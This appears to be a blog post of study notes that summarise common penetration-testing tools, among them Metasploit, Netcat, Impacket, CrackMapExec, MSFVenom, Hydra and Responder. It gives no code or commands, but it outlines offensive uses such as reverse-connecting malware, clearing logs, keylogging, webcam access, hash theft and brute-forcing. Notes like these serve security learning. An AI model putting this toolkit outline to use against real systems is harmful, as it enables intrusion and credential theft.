Exploit Tools:NOTES

Exploit Tools:NOTES

Metasploit

Identifies potential exploits and provides ability to execute;

Netcat

Creates communication channels between two systems; Installed on linux, Install Nmap on windows to access ncat command; Put a system into listening state for remote connection later; Listening over ports; Remote connection to devices;

Impacket

Used to craft network packets and perform network exploitation tasks; From Github; Has builtin scripts; [MOST USEFUL AFTER ENUMERATING A LOGIN AND PASSWORD] EG SMBClient manipulation and renumeration; AD Directory user ID enumeration; Password Hash Enumeration; Exploit WMIExec;

CRACKMAPEXEC

Uses protocols (SMB, LDAP, WInRM, MSSQL) to collect information about a group of systems; Discover computers on a network; Dictionary Attacks; Retrieve SAM databases; Executable with hashes or passwords;

MSFVenom

Generate Custom Payloads; Reverse Connections; Send malware to systems that when executed will connect back your machine (The Listener); Once connected execute file system commands, networking commands, system commands (clear logs!), Keylogging, Screenshots, Webcam access, Elevate commands, and much more;

Hydra – Brute Force Passwords;

Responder – Poisoning Attacks; Retrieve Hashes;

John – CrackHashes;

hping – custom ping messages;

 

r0tZ Avatar

Leave a Reply

Your email address will not be published. Required fields are marked *